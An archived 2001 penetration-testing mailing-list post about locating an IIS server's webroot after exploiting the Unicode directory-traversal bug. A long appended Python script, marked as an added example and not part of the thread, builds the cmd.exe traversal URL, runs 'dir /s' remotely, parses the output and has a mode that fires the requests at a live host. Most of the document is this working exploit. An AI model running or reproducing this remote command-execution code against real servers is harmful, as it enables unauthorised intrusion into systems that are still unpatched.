Penetration Testing mailing list archives

how to upload some file on IIS server with unicode bug


From: "Tran Le Minh" <tranleminh2001 () yahoo com>
Date: Fri, 15 Jun 2001 08:32:41 +0700


----- Original Message ----- 
From: "Jay D. Dyson" <jdyson () treachery net>
To: "Penetration Testers" <pen-test () securityfocus com>
Sent: Friday, June 15, 2001 12:31 AM
Subject: Re: finding webroot on IIS


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 13 Jun 2001, * wrote:

Recently I came across an IIS webserver that I found to be vulnerable to
the Unicode attacks. However, I cannot determine the webroot of this
drive, and therefore I am having trouble reaching a full compromise.
The directory "C:\Inetpub" exists, but the only thing this directory
contains is the folder "mailroot".

Additionally, when I connect and request the root document (i.e. GET / ),
it returns the string: "<% Response.ContentType = "text/plain" %> HELLO"

Has anyone come across anything like this before, and what would be the
simplest method of determining the webroot?

If you're exploiting via the Unicode attack, then it's just a
matter of finding a known quantity.  The hamfisted way will do in a pinch; 
namely this: 

1. Find a page by browsing for a sufficiently unique page
name (foobar.htm). 

2. Via the Unicode exploit, run this command:
dir DRIVE:\foobar.htm /s
(where DRIVE is the drive letter; usually C and/or D)

The IIS system will gleefully return its location.

- -Jay

  (    (                                                         _______
  ))   ))   .-"There's always time for a good cup of coffee."-.   >====<--.
C|~~|C|~~| (>------ Jay D. Dyson - jdyson () treachery net ------<) |    = |-'
 `--' `--'  `--- Every day's a Friday when you have a gun. ---'  `------'

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: See http://www.treachery.net/~jdyson/ for current keys.

iQCVAwUBOyjm2tCClfiU/BIVAQGRLgP/VxyGAGwuIApdktgiaQ/vTxyIyeJIpOuq
xjXexp30UCn1b8b141ZiW3QzRZPcYv7jqOy1h/5uh8GTsx4u4b8H1SE5KSuUcsqF
MJg/YgxRr1YT1WAx+VVUjeh5a2cgwkeVbeacfbub4RLTqQ1Rv2oZGNa46Zwg+YBD
hHZqn0Ebl38=
=MUu1
-----END PGP SIGNATURE-----
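Jay's two-step recipe, worked through as an added example (this is not code from the thread or its authors): the helper builds the URL that runs `dir DRIVE:\foobar.htm /s` through the IIS Unicode traversal, pulls the `Directory of` header lines out of the `dir /s` output, and strips the URL's own directory components off that path to arrive at the webroot. The `/scripts` virtual directory, the host 10.0.0.5, the `C:\webs\site1` location and the sample `dir` output are all constructed assumptions; the `%c0%af` overlong-UTF-8 slash is the classic encoding the IIS 4/5 Unicode bug (MS00-078) decoded after its traversal check.

```python
"""Locate an IIS webroot through the Unicode traversal bug (MS00-078).

Added example for the recipe in the thread: browse to a uniquely named page,
then run `dir DRIVE:\\page /s` through the traversal and read back where
cmd.exe found it. Host, virtual directory and the sample output are assumed.
"""
import re
import sys
from urllib.request import urlopen

# Overlong UTF-8 encoding of "/" that unpatched IIS 4/5 decoded only after
# the "..\" traversal check had already passed.
UNICODE_SLASH = "%c0%af"


def build_dir_url(host, filename, drive="C", vdir="/scripts"):
    """URL that makes cmd.exe run `dir DRIVE:\\filename /s` on the target.

    `vdir` must be a virtual directory with execute permission; /scripts is
    the classic one (an assumption; vary it if the box lacks it).
    """
    path = f"{vdir}/..{UNICODE_SLASH}../winnt/system32/cmd.exe"
    # cmd.exe arguments ride in the query string; '+' stands for a space.
    query = f"/c+dir+{drive}:\\{filename}+/s"
    return f"http://{host}{path}?{query}"


def parse_dir_s(output):
    """Directories that `dir /s` listed as containing the file.

    cmd.exe prints a ' Directory of X' header for every folder with a hit,
    so each capture is a folder holding a file of that name.
    """
    return re.findall(r"^\s*Directory of (.+?)\s*$", output, flags=re.M)


def infer_webroot(dir_path, url_path):
    """Strip the URL's own directory components off the filesystem path.

    If /docs/foobar.htm lives in C:\\webs\\site1\\docs, the webroot is
    C:\\webs\\site1. Matching is case-insensitive, like NTFS.
    """
    url_dirs = [p for p in url_path.split("/")[:-1] if p]
    parts = dir_path.rstrip("\\").split("\\")
    for d in reversed(url_dirs):
        if parts and parts[-1].lower() == d.lower():
            parts.pop()
    return "\\".join(parts)


def locate_webroot(dir_output, url_path):
    """Candidate webroots from one `dir /s` response (several if the
    page name turned out not to be unique after all)."""
    return [infer_webroot(d, url_path) for d in parse_dir_s(dir_output)]


# Constructed sample of what cmd.exe returns; not captured from a real host.
SAMPLE_DIR_OUTPUT = """\
 Volume in drive C has no label.
 Volume Serial Number is 1234-ABCD

 Directory of C:\\webs\\site1

06/13/2001  02:15p                 1,024 foobar.htm
               1 File(s)          1,024 bytes

     Total Files Listed:
               1 File(s)          1,024 bytes
               0 Dir(s)   1,234,567,890 bytes free
"""


def run_against_host(host, url_path, drives=("C", "D")):
    """Fire the request for each drive letter (Jay's 'C and/or D') and
    report candidate webroots. Only for systems you are authorised to test."""
    filename = url_path.rsplit("/", 1)[-1]
    found = []
    for drive in drives:
        url = build_dir_url(host, filename, drive)
        with urlopen(url, timeout=10) as resp:
            body = resp.read().decode("latin-1", errors="replace")
        found.extend(locate_webroot(body, url_path))
    return found


if __name__ == "__main__":
    # Offline demo on the constructed sample; pass host and page path to go live.
    if len(sys.argv) == 3:
        print(run_against_host(sys.argv[1], sys.argv[2]))
    else:
        print(build_dir_url("10.0.0.5", "foobar.htm"))
        print(locate_webroot(SAMPLE_DIR_OUTPUT, "/foobar.htm"))
```

The page name you pick in step 1 matters: if `dir /s` returns more than one `Directory of` line, the name was not unique and you get several candidates, which is why `locate_webroot` returns a list rather than a single path.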
